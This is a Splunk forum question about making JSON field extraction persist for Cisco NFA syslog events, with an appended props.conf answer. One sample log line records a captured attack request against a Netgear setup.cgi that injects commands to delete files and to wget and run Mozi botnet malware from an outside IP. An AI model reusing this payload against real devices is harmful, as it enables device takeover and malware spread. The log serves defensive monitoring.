Splunk Search

Json data fields are not extracting properly

srivenna
Engager

Cisco logs in JSON format are not extracting properly. I tried from the GUI using these kv delims in search and they are working fine.

| kv pairdelim="," kvdelim="=:"

But how can I save them? Or do we have any alternate way to extract these fields?

2022-01-31T13:11:20.233100-05:00 prd-vswnfa.bbtnet.com {"source": "cisco_nfa", "time": "2022-01-31 16:26:47+00:00", "alert": "http-shell-cmd", "tactic": "Initial Access", "ttp": "Exploit Public-Facing Application", "flow_id": "13847779", "app": "HTTP", "user": "", "s_hg": "China,CHINA UNICOM China169 Backbone", "s_ip": "125.46.191.152", "s_port": 41007, "s_bytes": 245, "s_payload": "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://125.46.191.152:39222/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1", "p_hg": "Public Space BBT", "p_ip": "74.120.69.217", "p_port": 80, "p_bytes": 303, "p_payload": "301 301 Moved Permanently"}

2022-01-31T13:11:20.202060-05:00 prd-vswnfa.bbtnet.com {"source": "cisco_nfa", "time": "2022-01-31 14:28:58+00:00", "alert": "log4j-shell-recon", "tactic": "Reconnaissance", "ttp": "Gather Victim Host Information", "flow_id": "13842059", "app": "HTTPS", "user": "", "s_hg": "Log4j Watchlist,Brute Force,Apache,Germany,Tor IP,Tor Exit IP", "s_ip": "185.220.101.157", "s_port": 9390, "s_bytes": 820, "s_payload": "............,.lb....Z.....", "p_hg": "Public Space BBT", "p_ip": "74.120.69.238", "p_port": 443, "p_bytes": 1460, "p_payload": "...m..J..4.v.A....\"FJ...:."}
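One way to make the extraction persistent, as an added example that is not part of the original post: a props.conf stanza that pulls the JSON object out of the syslog-prefixed event at search time and parses it with spath, with an index-time alternative in the comments. The sourcetype name `cisco:nfa` and the field name `nfa_json` are assumptions.

```ini
# props.conf -- added example, not from the original post.
# Assumed sourcetype name "cisco:nfa"; adjust to whatever the input assigns.
# Event shape: "<ISO-8601 timestamp> <host> <JSON object>", so automatic
# JSON parsing (KV_MODE = json) never fires: the event does not begin with "{".

[cisco:nfa]
# Search-time: keep _raw intact and capture the JSON object into its own
# field. The named group "nfa_json" becomes a search-time field on every event.
EXTRACT-nfa_json_body = ^\S+\s+\S+\s+(?<nfa_json>\{.*\})$

# Why not persist "| kv pairdelim=\",\" kvdelim=\"=:\"": values such as
# s_payload (contains "=" and ":") and s_hg (contains ",") are split on those
# delimiters and come out mangled. Parse the JSON body with spath instead:
#   sourcetype=cisco:nfa
#   | spath input=nfa_json
#   | fields - nfa_json
#   | table _time alert tactic ttp s_ip s_port p_ip p_port s_payload
# Save that search as a report, or put the spath line in a macro, so analysts
# do not have to retype it.

# Index-time alternative (props.conf on the indexer or heavy forwarder): rewrite
# _raw so that KV_MODE = json applies directly. SEDCMD runs after timestamp
# extraction, so the ISO-8601 prefix still sets _time before it is removed.
# The prefix (including the host string) is then gone from _raw, and the
# change only affects events indexed after the restart.
# [cisco:nfa]
# SEDCMD-strip_syslog_prefix = s/^\S+\s+\S+\s+\{/{/
# KV_MODE = json
```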
